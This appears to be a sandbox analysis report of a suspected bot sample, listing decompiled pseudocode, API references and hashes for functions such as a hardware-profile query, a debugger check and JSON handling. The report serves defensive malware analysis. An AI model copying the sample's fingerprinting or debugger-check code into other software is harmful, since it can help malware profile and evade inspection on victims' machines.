Function 00406D40 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406D40(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				struct tagHW_PROFILE_INFOA* _v8;
				intOrPtr _v12;
				intOrPtr _v16;

				_v16 = __ecx;
				_v12 = E0040DD30(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a4)));
				return GetCurrentHwProfileA(_v8);
			}

0x00406d46
0x00406d4e
0x00406d5f
0x00406d6c

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00406D66

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: fca5c86fd647c30bf730b26b20be5c0e6f7dae974e0183026cd7bba46d5933df
Instruction ID: 332cbe6b2b16407cc13544d924e2bd5f4fc9082654926c3cc62686002605f1e3
Opcode Fuzzy Hash: fca5c86fd647c30bf730b26b20be5c0e6f7dae974e0183026cd7bba46d5933df
Instruction Fuzzy Hash: CCE012B9D0430CBFCB00EFE5D44589EBB78AF48300F1085BEE90567341E639AA14DB95

Uniqueness

Uniqueness Score: -1.00%

Function 004394C7 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004394C7(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x004394e4
0x004394eb

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,004398B7,?,?,00000000,?,004398B7,00000000,0000000C), ref: 004394E4

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ee66bb13021393ee66028e72bdb5fcadfedaca3dca15b895a13f9b39a0a9811c
Instruction ID: c4e568fe720711f71c51b48a75bf82b6487f92725d29f3aa234e25aaf45b446a
Opcode Fuzzy Hash: ee66bb13021393ee66028e72bdb5fcadfedaca3dca15b895a13f9b39a0a9811c
Instruction Fuzzy Hash: CDD06C3200010DBBDF029F84DD06EDA3BAAFB48714F014010BA5856020C732E831EB94

Uniqueness

Uniqueness Score: -1.00%

Function 0043195F Relevance: 1.5, APIs: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043195F(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E00432BD6(_a4); // executed
				return _t5;
			}

0x00431968
0x00431972
0x00431979

APIs

_free.LIBCMT ref: 00431972

Part of subcall function 00432BD6: RtlFreeHeap.NTDLL(00000000,00000000,?,00431C11), ref: 00432BEC
Part of subcall function 00432BD6: GetLastError.KERNEL32(?,?,00431C11), ref: 00432BFE

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 0582fa03dcd8346712b2889bfc5eaa353923f96149c303438fb913e04e55e303
Instruction ID: a05db127202b2e2a73eb048a2436ed80360e5a82b212b52119b0580fd83a5e0c
Opcode Fuzzy Hash: 0582fa03dcd8346712b2889bfc5eaa353923f96149c303438fb913e04e55e303
Instruction Fuzzy Hash: 5BC08C31000208BBCB00AF42D906E8EBBA8EB80368F200048F40017280CAF1EE409680

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00425272 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00425272(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00425467(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00427330(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00427330(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00425467(_t49);
				}
				return _t49;
			}

0x00425272
0x00425272
0x00425272
0x00425286
0x00425288
0x0042528b
0x0042528b
0x0042528f
0x00425294
0x004252ac
0x004252b2
0x004252b8
0x004252be
0x004252c4
0x004252ca
0x004252d0
0x004252d7
0x004252de
0x004252e5
0x004252ec
0x004252f3
0x004252fa
0x004252fb
0x00425304
0x0042530a
0x0042530d
0x00425313
0x00425322
0x0042532e
0x00425339
0x00425340
0x00425347
0x00425352
0x0042535a
0x00425363
0x00425365
0x00425368
0x0042536a
0x00425374
0x0042537c
0x00425382
0x00000000
0x00425389
0x0042538c

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042527E
IsDebuggerPresent.KERNEL32 ref: 0042534A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042536A
UnhandledExceptionFilter.KERNEL32(?), ref: 00425374

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 34c421598a168372c5480733cf3261ea47578e35fdbf4e363d354a00810f10a3
Instruction ID: c643cc853496c547fde770940eafcf6f4ce635b491a1c588870d0f6c16e47f59
Opcode Fuzzy Hash: 34c421598a168372c5480733cf3261ea47578e35fdbf4e363d354a00810f10a3
Instruction Fuzzy Hash: 32314B75D05228DBDB20DFA0E989BCDBBB8BF08304F5041AAE40DA7250EB755A84CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5F0 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0041F5F0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				char _v176;
				char _v200;
				char _v224;
				char _v248;
				char _v272;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				signed int _t52;
				signed char _t55;
				void* _t92;
				void* _t96;
				intOrPtr _t101;
				void* _t138;
				void* _t139;
				signed int _t140;
				void* _t141;

				_t139 = __esi;
				_t138 = __edi;
				_t96 = __ebx;
				_t52 =  *0x4c61a4; // 0x8656a166
				_v8 = _t52 ^ _t140;
				_v300 = __ecx;
				E00415310( &_v32, __eflags, "syntax error ");
				_t55 = E0041ED60(_a12);
				_t150 = _t55 & 0x000000ff;
				if((_t55 & 0x000000ff) == 0) {
					_t92 = E00406240(_t150,  &_v56, E00406350(_t150,  &_v80, "while parsing ", _a12), " ");
					_t141 = _t141 + 0x18;
					E00418020( &_v32, _t92);
					E00416980( &_v56);
					E00416980( &_v80);
				}
				E00418060( &_v32, "- ");
				_t101 = _v300;
				_t151 =  *((intOrPtr*)(_t101 + 0x28)) - 0xe;
				if( *((intOrPtr*)(_t101 + 0x28)) != 0xe) {
					E00418020( &_v32, E00406320(__eflags,  &_v224, "unexpected ", E00415310( &_v248, __eflags, E00424490( *((intOrPtr*)(_v300 + 0x28)),  *((intOrPtr*)(_v300 + 0x28))))));
					E00416980( &_v224);
					_t106 =  &_v248;
					E00416980( &_v248);
				} else {
					_v304 = _v300 + 0x30;
					_v308 = E004201C0(_t96, _v304, _t138, _t139,  &_v200);
					_v312 = E00406240(_t151,  &_v152, E00415310( &_v176, _t151, E00420060(_v300 + 0x30)), "; last read: \'");
					E00418020( &_v32, E00406240(_t151,  &_v104, E004061F0( &_v128,  &_v128, _v312, _v308), "\'"));
					E00416980( &_v104);
					E00416980( &_v128);
					E00416980( &_v152);
					E00416980( &_v176);
					_t106 =  &_v200;
					E00416980( &_v200);
				}
				_t152 = _a8;
				if(_a8 != 0) {
					E00418020( &_v32, E00406320(_t152,  &_v272, "; expected ", E00415310( &_v296, _t152, E00424490(_t106, _a8))));
					E00416980( &_v272);
					E00416980( &_v296);
				}
				E004151C0(_a4,  &_v32);
				E00416980( &_v32);
				return E00424900(_a4, _t96, _v8 ^ _t140,  &_v32, _t138, _t139);
			}

0x0041f5f0
0x0041f5f0
0x0041f5f0
0x0041f5f9
0x0041f600
0x0041f603
0x0041f611
0x0041f619
0x0041f621
0x0041f623
0x0041f644
0x0041f649
0x0041f650
0x0041f658
0x0041f660
0x0041f660
0x0041f66d
0x0041f672
0x0041f678
0x0041f67c
0x0041f77d
0x0041f788
0x0041f78d
0x0041f793
0x0041f682
0x0041f68b
0x0041f6a3
0x0041f6d8
0x0041f70e
0x0041f716
0x0041f71e
0x0041f729
0x0041f734
0x0041f739
0x0041f73f
0x0041f73f
0x0041f798
0x0041f79c
0x0041f7cf
0x0041f7da
0x0041f7e5
0x0041f7e5
0x0041f7f1
0x0041f7f9
0x0041f80e

APIs

_Func_class.LIBCPMTD ref: 0041F619
task.LIBCPMTD ref: 0041F658
task.LIBCPMTD ref: 0041F660
task.LIBCPMTD ref: 0041F716
task.LIBCPMTD ref: 0041F71E
task.LIBCPMTD ref: 0041F729
task.LIBCPMTD ref: 0041F734
task.LIBCPMTD ref: 0041F73F
task.LIBCPMTD ref: 0041F788
task.LIBCPMTD ref: 0041F793
task.LIBCPMTD ref: 0041F7DA
task.LIBCPMTD ref: 0041F7E5
task.LIBCPMTD ref: 0041F7F9

Part of subcall function 00406350: char_traits.LIBCPMTD ref: 0040635A

Strings

; last read: ', xrefs: 0041F6A9
unexpected , xrefs: 0041F765
; expected , xrefs: 0041F7B7
while parsing , xrefs: 0041F62E
PL, xrefs: 0041F7A1
syntax error , xrefs: 0041F609

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$Func_classchar_traits
String ID: ; expected $; last read: '$PL$syntax error $unexpected $while parsing
API String ID: 1959534108-4253400555
Opcode ID: 92158c34cf2a0d35347cbd2b3351ce662dd9541d62566c975484f76fc39ae872
Instruction ID: 836322f6b91b5ade16788d56910e91f41fbd1d93ad05ac7b31140659a56a68b8
Opcode Fuzzy Hash: 92158c34cf2a0d35347cbd2b3351ce662dd9541d62566c975484f76fc39ae872
Instruction Fuzzy Hash: 795163B1D101189BDB14FB61DC52EEEB378AF14304F5041AEE40A66192EF386E98CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041CFE9 Relevance: 25.0, APIs: 10, Strings: 4, Instructions: 461
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041CFE9(void* __ebx, void* __edi, void* __esi) {
				void* _t271;
				void* _t296;
				void* _t366;
				intOrPtr _t375;
				signed int _t412;
				intOrPtr _t422;
				signed int _t524;
				void* _t526;
				void* _t527;
				void* _t528;
				void* _t530;

				_t527 = __esi;
				_t526 = __edi;
				_t366 = __ebx;
				if((E0041ED30( *((intOrPtr*)( *((intOrPtr*)(_t528 + 8)) + 8))) & 0x000000ff) == 0) {
					__eflags =  *(_t528 + 0xc) & 0x000000ff;
					if(( *(_t528 + 0xc) & 0x000000ff) == 0) {
						 *((intOrPtr*)(_t528 - 0x68)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x15c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x68))))));
						 *((intOrPtr*)(_t528 - 0x15c))(0x7b);
						 *((intOrPtr*)(_t528 - 0x160)) =  *((intOrPtr*)( *((intOrPtr*)(_t528 + 8)) + 8));
						E0041B050( *((intOrPtr*)(_t528 - 0x160)), _t528 - 0xc);
						 *(_t528 - 0x1c) = 0;
						while(1) {
							__eflags =  *(_t528 - 0x1c) - E00423E30( *((intOrPtr*)( *((intOrPtr*)(_t528 + 8)) + 8))) - 1;
							if(__eflags >= 0) {
								break;
							}
							 *((intOrPtr*)(_t528 - 0x6c)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
							 *((intOrPtr*)(_t528 - 0x164)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x6c))))));
							 *((intOrPtr*)(_t528 - 0x164))(0x22);
							E0041E250(_t366,  *((intOrPtr*)(_t528 - 4)), _t526, _t527, E00417430(_t528 - 0xc, __eflags),  *(_t528 + 0x10) & 0x000000ff);
							 *((intOrPtr*)(_t528 - 0x70)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
							 *((intOrPtr*)(_t528 - 0x168)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x70)))) + 4));
							 *((intOrPtr*)(_t528 - 0x168))("\":", 2);
							E0041CFC0(_t366,  *((intOrPtr*)(_t528 - 4)), _t526, _t527, E00417430(_t528 - 0xc, __eflags) + 0x18, 0,  *(_t528 + 0x10) & 0x000000ff,  *((intOrPtr*)(_t528 + 0x14)),  *((intOrPtr*)(_t528 + 0x18)));
							 *((intOrPtr*)(_t528 - 0x74)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
							 *((intOrPtr*)(_t528 - 0x16c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x74))))));
							 *((intOrPtr*)(_t528 - 0x16c))(0x2c);
							_t412 =  *(_t528 - 0x1c) + 1;
							__eflags = _t412;
							 *(_t528 - 0x1c) = _t412;
							E00417610(_t528 - 0xc);
						}
						_t375 =  *((intOrPtr*)(_t528 + 8));
						_t491 =  *((intOrPtr*)(_t375 + 8));
						 *((intOrPtr*)(_t528 - 0x170)) =  *((intOrPtr*)(_t375 + 8));
						__eflags = E00417140(_t528 - 0xc, E0041B090( *((intOrPtr*)(_t528 - 0x170)), _t528 - 0x26c)) & 0x000000ff;
						if(__eflags == 0) {
							_push(0x3f66);
							E00430DB7(_t366, _t491, _t526, _t527, __eflags, L"i != val.m_value.object->cend()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
							_t530 = _t530 + 0xc;
						}
						 *((intOrPtr*)(_t528 - 0x17c)) = E00411FF0(_t528 - 0x270,  *((intOrPtr*)(_t528 - 0xc)), 1);
						 *((intOrPtr*)(_t528 - 0x174)) =  *((intOrPtr*)( *((intOrPtr*)(_t528 + 8)) + 8));
						 *((intOrPtr*)(_t528 - 0x178)) = E0041B090( *((intOrPtr*)(_t528 - 0x174)), _t528 - 0x274);
						_t493 =  *((intOrPtr*)(_t528 - 0x178));
						__eflags = E00417050( *((intOrPtr*)(_t528 - 0x17c)),  *((intOrPtr*)(_t528 - 0x178))) & 0x000000ff;
						if(__eflags == 0) {
							_push(0x3f67);
							E00430DB7(_t366, _t493, _t526, _t527, __eflags, L"std::next(i) == val.m_value.object->cend()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
						}
						 *((intOrPtr*)(_t528 - 0x78)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x180)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x78))))));
						 *((intOrPtr*)(_t528 - 0x180))(0x22);
						E0041E250(_t366,  *((intOrPtr*)(_t528 - 4)), _t526, _t527, E00417430(_t528 - 0xc, __eflags),  *(_t528 + 0x10) & 0x000000ff);
						 *((intOrPtr*)(_t528 - 0x7c)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x184)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x7c)))) + 4));
						 *((intOrPtr*)(_t528 - 0x184))("\":", 2);
						E0041CFC0(_t366,  *((intOrPtr*)(_t528 - 4)), _t526, _t527, E00417430(_t528 - 0xc, __eflags) + 0x18, 0,  *(_t528 + 0x10) & 0x000000ff,  *((intOrPtr*)(_t528 + 0x14)),  *((intOrPtr*)(_t528 + 0x18)));
						 *((intOrPtr*)(_t528 - 0x80)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x188)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x80))))));
						_t271 =  *((intOrPtr*)(_t528 - 0x188))(0x7d);
					} else {
						 *((intOrPtr*)(_t528 - 0x3c)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x10c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x3c)))) + 4));
						 *((intOrPtr*)(_t528 - 0x10c))(0x441274, 2);
						 *((intOrPtr*)(_t528 - 0x10)) =  *((intOrPtr*)(_t528 + 0x18)) +  *((intOrPtr*)(_t528 + 0x14));
						_t296 = E00420EE0( *((intOrPtr*)(_t528 - 4)) + 0x250);
						__eflags = _t296 -  *((intOrPtr*)(_t528 - 0x10));
						if(_t296 <  *((intOrPtr*)(_t528 - 0x10))) {
							 *((intOrPtr*)(_t528 - 0x110)) =  *((intOrPtr*)(_t528 - 4)) + 0x250;
							__eflags = E00420EE0( *((intOrPtr*)(_t528 - 4)) + 0x250) << 1;
							E00422470( *((intOrPtr*)(_t528 - 0x110)), E00420EE0( *((intOrPtr*)(_t528 - 4)) + 0x250) << 1, 0x20);
						}
						 *((intOrPtr*)(_t528 - 0x114)) =  *((intOrPtr*)( *((intOrPtr*)(_t528 + 8)) + 8));
						E0041B050( *((intOrPtr*)(_t528 - 0x114)), _t528 - 8);
						 *(_t528 - 0x18) = 0;
						while(1) {
							__eflags =  *(_t528 - 0x18) - E00423E30( *((intOrPtr*)( *((intOrPtr*)(_t528 + 8)) + 8))) - 1;
							if(__eflags >= 0) {
								break;
							}
							 *((intOrPtr*)(_t528 - 0x40)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
							 *((intOrPtr*)(_t528 - 0x11c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x40)))) + 4));
							 *((intOrPtr*)(_t528 - 0x118)) = E0041AF80( *((intOrPtr*)(_t528 - 4)) + 0x250);
							 *((intOrPtr*)(_t528 - 0x11c))( *((intOrPtr*)(_t528 - 0x118)),  *((intOrPtr*)(_t528 - 0x10)));
							 *((intOrPtr*)(_t528 - 0x44)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
							 *((intOrPtr*)(_t528 - 0x120)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x44))))));
							 *((intOrPtr*)(_t528 - 0x120))(0x22);
							E0041E250(_t366,  *((intOrPtr*)(_t528 - 4)), _t526, _t527, E00417430(_t528 - 8, __eflags),  *(_t528 + 0x10) & 0x000000ff);
							 *((intOrPtr*)(_t528 - 0x48)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
							 *((intOrPtr*)(_t528 - 0x124)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x48)))) + 4));
							 *((intOrPtr*)(_t528 - 0x124))("": ", 3);
							E0041CFC0(_t366,  *((intOrPtr*)(_t528 - 4)), _t526, _t527, E00417430(_t528 - 8, __eflags) + 0x18, 1,  *(_t528 + 0x10) & 0x000000ff,  *((intOrPtr*)(_t528 + 0x14)),  *((intOrPtr*)(_t528 - 0x10)));
							 *((intOrPtr*)(_t528 - 0x4c)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
							 *((intOrPtr*)(_t528 - 0x128)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x4c)))) + 4));
							 *((intOrPtr*)(_t528 - 0x128))(0x44127c, 2);
							_t524 =  *(_t528 - 0x18) + 1;
							__eflags = _t524;
							 *(_t528 - 0x18) = _t524;
							E00417610(_t528 - 8);
						}
						_t422 =  *((intOrPtr*)(_t528 + 8));
						_t505 =  *((intOrPtr*)(_t422 + 8));
						 *((intOrPtr*)(_t528 - 0x12c)) =  *((intOrPtr*)(_t422 + 8));
						__eflags = E00417140(_t528 - 8, E0041B090( *((intOrPtr*)(_t528 - 0x12c)), _t528 - 0x260)) & 0x000000ff;
						if(__eflags == 0) {
							_push(0x3f4a);
							E00430DB7(_t366, _t505, _t526, _t527, __eflags, L"i != val.m_value.object->cend()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
							_t530 = _t530 + 0xc;
						}
						 *((intOrPtr*)(_t528 - 0x138)) = E00411FF0(_t528 - 0x264,  *((intOrPtr*)(_t528 - 8)), 1);
						 *((intOrPtr*)(_t528 - 0x130)) =  *((intOrPtr*)( *((intOrPtr*)(_t528 + 8)) + 8));
						 *((intOrPtr*)(_t528 - 0x134)) = E0041B090( *((intOrPtr*)(_t528 - 0x130)), _t528 - 0x268);
						_t507 =  *((intOrPtr*)(_t528 - 0x134));
						__eflags = E00417050( *((intOrPtr*)(_t528 - 0x138)),  *((intOrPtr*)(_t528 - 0x134))) & 0x000000ff;
						if(__eflags == 0) {
							_push(0x3f4b);
							E00430DB7(_t366, _t507, _t526, _t527, __eflags, L"std::next(i) == val.m_value.object->cend()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
						}
						 *((intOrPtr*)(_t528 - 0x50)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x140)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x50)))) + 4));
						 *((intOrPtr*)(_t528 - 0x13c)) = E0041AF80( *((intOrPtr*)(_t528 - 4)) + 0x250);
						 *((intOrPtr*)(_t528 - 0x140))( *((intOrPtr*)(_t528 - 0x13c)),  *((intOrPtr*)(_t528 - 0x10)));
						 *((intOrPtr*)(_t528 - 0x54)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x144)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x54))))));
						 *((intOrPtr*)(_t528 - 0x144))(0x22);
						E0041E250(_t366,  *((intOrPtr*)(_t528 - 4)), _t526, _t527, E00417430(_t528 - 8, __eflags),  *(_t528 + 0x10) & 0x000000ff);
						 *((intOrPtr*)(_t528 - 0x58)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x148)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x58)))) + 4));
						 *((intOrPtr*)(_t528 - 0x148))("": ", 3);
						E0041CFC0(_t366,  *((intOrPtr*)(_t528 - 4)), _t526, _t527, E00417430(_t528 - 8, __eflags) + 0x18, 1,  *(_t528 + 0x10) & 0x000000ff,  *((intOrPtr*)(_t528 + 0x14)),  *((intOrPtr*)(_t528 - 0x10)));
						 *((intOrPtr*)(_t528 - 0x5c)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x14c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x5c))))));
						 *((intOrPtr*)(_t528 - 0x14c))(0xa);
						 *((intOrPtr*)(_t528 - 0x60)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x154)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x60)))) + 4));
						 *((intOrPtr*)(_t528 - 0x150)) = E0041AF80( *((intOrPtr*)(_t528 - 4)) + 0x250);
						 *((intOrPtr*)(_t528 - 0x154))( *((intOrPtr*)(_t528 - 0x150)),  *((intOrPtr*)(_t528 + 0x18)));
						 *((intOrPtr*)(_t528 - 0x64)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
						 *((intOrPtr*)(_t528 - 0x158)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x64))))));
						_t271 =  *((intOrPtr*)(_t528 - 0x158))(0x7d);
					}
				} else {
					 *((intOrPtr*)(_t528 - 0x38)) = E004061D0( *((intOrPtr*)(_t528 - 4)));
					 *((intOrPtr*)(_t528 - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t528 - 0x38)))) + 4));
					_t271 =  *((intOrPtr*)(_t528 - 0x108))(0x441270, 2);
				}
				return _t271;
			}

0x0041cfe9
0x0041cfe9
0x0041cfe9
0x0041cff9
0x0041d02d
0x0041d02f
0x0041d3f5
0x0041d3ff
0x0041d40a
0x0041d416
0x0041d426
0x0041d42b
0x0041d445
0x0041d453
0x0041d456
0x00000000
0x00000000
0x0041d464
0x0041d46e
0x0041d479
0x0041d490
0x0041d49d
0x0041d4a8
0x0041d4b8
0x0041d4dc
0x0041d4e9
0x0041d4f3
0x0041d4fe
0x0041d437
0x0041d437
0x0041d43a
0x0041d440
0x0041d440
0x0041d509
0x0041d50c
0x0041d50f
0x0041d533
0x0041d535
0x0041d537
0x0041d546
0x0041d54b
0x0041d54b
0x0041d563
0x0041d56f
0x0041d587
0x0041d58d
0x0041d5a2
0x0041d5a4
0x0041d5a6
0x0041d5b5
0x0041d5ba
0x0041d5c5
0x0041d5cf
0x0041d5da
0x0041d5f1
0x0041d5fe
0x0041d609
0x0041d619
0x0041d63d
0x0041d64a
0x0041d654
0x0041d65f
0x0041d035
0x0041d03d
0x0041d048
0x0041d058
0x0041d064
0x0041d070
0x0041d075
0x0041d078
0x0041d083
0x0041d099
0x0041d0a2
0x0041d0a2
0x0041d0ad
0x0041d0bd
0x0041d0c2
0x0041d0dc
0x0041d0ea
0x0041d0ed
0x00000000
0x00000000
0x0041d0fb
0x0041d106
